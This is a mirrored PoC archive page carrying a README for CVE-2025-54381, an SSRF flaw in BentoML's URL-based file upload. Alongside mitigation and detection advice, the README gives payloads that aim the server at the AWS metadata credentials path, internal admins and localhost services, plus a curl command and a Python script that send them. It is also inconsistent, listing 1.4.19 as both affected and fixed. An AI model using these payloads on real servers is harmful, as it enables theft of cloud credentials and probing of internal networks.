Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-54381 PoC — BentoML is Vulnerable to an SSRF Attack Through File Upload Processing

Source
https://github.com/B1ack4sh/Blackash-CVE-2025-54381
Associated Vulnerability
Title:BentoML is Vulnerable to an SSRF Attack Through File Upload Processing (CVE-2025-54381)
Description:BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.0 until 1.4.19, the file upload processing system contains an SSRF vulnerability that allows unauthenticated remote attackers to force the server to make arbitrary HTTP requests. The vulnerability stems from the multipart form data and JSON request handlers, which automatically download files from user-provided URLs without validating whether those URLs point to internal network addresses, cloud metadata endpoints, or other restricted resources. The documentation explicitly promotes this URL-based file upload feature, making it an intended design that exposes all deployed services to SSRF attacks by default. Version 1.4.19 contains a patch for the issue.
Description
CVE-2025-54381
Readme
# **🔓 CVE-2025-54381 – ⚠️ Critical SSRF Vulnerability in BentoML Allows 🚨 Unauthorized Internal & Cloud Metadata Access**

---

## 📛 CVE Information

* **CVE ID:** CVE-2025-54381
* **Published Date:** July 30, 2025
* **Discovered by:** Wiz Research Team
* **Reported to GitHub Advisory Database & NVD**
* **Severity:** Critical
* **CVSS v3.1 Score:** **9.9 / 10**

---

## 📦 Affected Software

* **Product:** [BentoML](https://github.com/bentoml/BentoML) (Python-based framework for packaging, shipping, and deploying ML models)
* **Affected Versions:**

  * All versions from **1.4.0** up to and including **1.4.19**

---

## 🔍 Vulnerability Type

* **Type:** SSRF (Server-Side Request Forgery)
* **CWE Category:** CWE-918 – Server-Side Request Forgery

---

## ⚠️ Detailed Vulnerability Description

The vulnerability lies in the **URL-based file upload** feature in BentoML's model-serving APIs. Specifically, BentoML supports receiving file inputs via URLs in both:

1. **Multipart Form Requests**
2. **JSON POST Requests**

The framework then performs a **server-side HTTP GET request** to download the file **without properly validating the user-supplied URL**.

### What makes it dangerous?

The server can be tricked into:

* Accessing **internal-only services**, e.g. `http://localhost:...`, `http://127.0.0.1:...`
* Accessing **cloud metadata endpoints** like:

  * `http://169.254.169.254/latest/meta-data/` (AWS)
  * `http://metadata.google.internal/` (GCP)
* Accessing **internal IP ranges**:

  * `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`

These endpoints may expose:

* IAM credentials
* Tokens
* Service secrets
* Private APIs
* Admin dashboards

---

## 💣 Impact

| Impact Area             | Description                                |
| ----------------------- | ------------------------------------------ |
| **Confidentiality**     | High — attacker may steal internal secrets |
| **Integrity**           | Low — read-only attack                     |
| **Availability**        | Low — unlikely to crash the system         |
| **Scope**               | Changed — attack may reach other systems   |
| **Privileges Required** | None                                       |
| **User Interaction**    | None                                       |

---

## 🧪 Exploitation Examples

### Example 1: Accessing AWS Metadata

```json
{
  "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
```

If the server is hosted on AWS, this fetches sensitive IAM role credentials.

---

### Example 2: Internal Reconnaissance

```json
{
  "url": "http://10.0.0.15:8080/admin"
}
```

The attacker could scan for internal services exposed only on the private network.

---

### Example 3: Localhost SSRF

```json
{
  "url": "http://127.0.0.1:9000/metrics"
}
```

This may expose services like Prometheus, Grafana, MinIO, etc.

---

## 🔧 Fix & Mitigation

### ✅ Fixed in version 1.4.19

Patch introduces:

* URL scheme validation
* IP address checking
* Blocking requests to:

  * localhost
  * internal IP ranges
  * metadata endpoints
* Additional safeguards for both JSON and multipart upload handlers

---

### 🧱 Temporary Mitigations

If you cannot upgrade:

1. **Add firewall rules** to block outbound traffic to internal networks and metadata endpoints.
2. **Use a proxy** with allowlists for outgoing requests.
3. **Implement URL filtering logic** before allowing downloads.
4. **Disable URL-based file upload** feature if not needed.
5. **Log all outbound requests** and monitor suspicious connections.

---

## 🧰 Detection

* Monitor logs for requests from BentoML to:

  * `169.254.169.254`
  * `127.0.0.1`
  * `10.*.*.*`, `192.168.*.*`, etc.
* Use dynamic analysis tools (DAST) to fuzz file-upload endpoints with internal URLs.
* Check for unexpected `GET` requests made from your BentoML server to unauthorized endpoints.

---

## 🧪 Proof of Concept (PoC)

### Basic JSON Request Exploiting SSRF

```bash
curl -X POST http://<target>:3000/upload \
  -H "Content-Type: application/json" \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'
```

### Python PoC

```python
import requests

url = "http://target-server/upload"
data = {"url": "http://169.254.169.254/latest/meta-data/"}
r = requests.post(url, json=data)
print(r.text)
```

---

## ✅ Recommended Actions for Security Teams

1. **Identify all BentoML deployments**
2. **Upgrade to 1.4.19 or later**
3. **Disable URL-based uploads** unless absolutely needed
4. **Apply egress filtering on server firewalls**
5. **Audit logs** for abnormal outbound HTTP traffic
6. **Conduct a code review** for any custom handlers using `requests.get()` or similar with user input

---

## 📚 Summary Table

| Key               | Value                            |
| ----------------- | -------------------------------- |
| CVE ID            | CVE-2025-54381                   |
| Product           | BentoML                          |
| Versions Affected | 1.4.0 – 1.4.19                   |
| Vulnerability     | SSRF                             |
| CVSS v3.1 Score   | 9.9 (Critical)                   |
| Fixed Version     | 1.4.19                           |
| Exploitable by    | Remote attacker (no auth needed) |
| Discovered by     | Wiz Research                     |

---


## 🔒Disclaimer:

This content is provided **strictly for educational, ethical, and informational purposes only**. The goal is to raise awareness about CVE-2025-54381 and help developers and security professionals understand, detect, and remediate potential vulnerabilities in their systems.

**❌ Any unauthorized use of this information to exploit or harm systems without explicit permission is illegal and unethical.**
By proceeding, you agree to use this knowledge responsibly and in compliance with all applicable laws and ethical guidelines.
File Snapshot

 [4.0K]  /data/pocs/00a0809e34923d192be6512dbc10ada5578414b8
└── [5.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →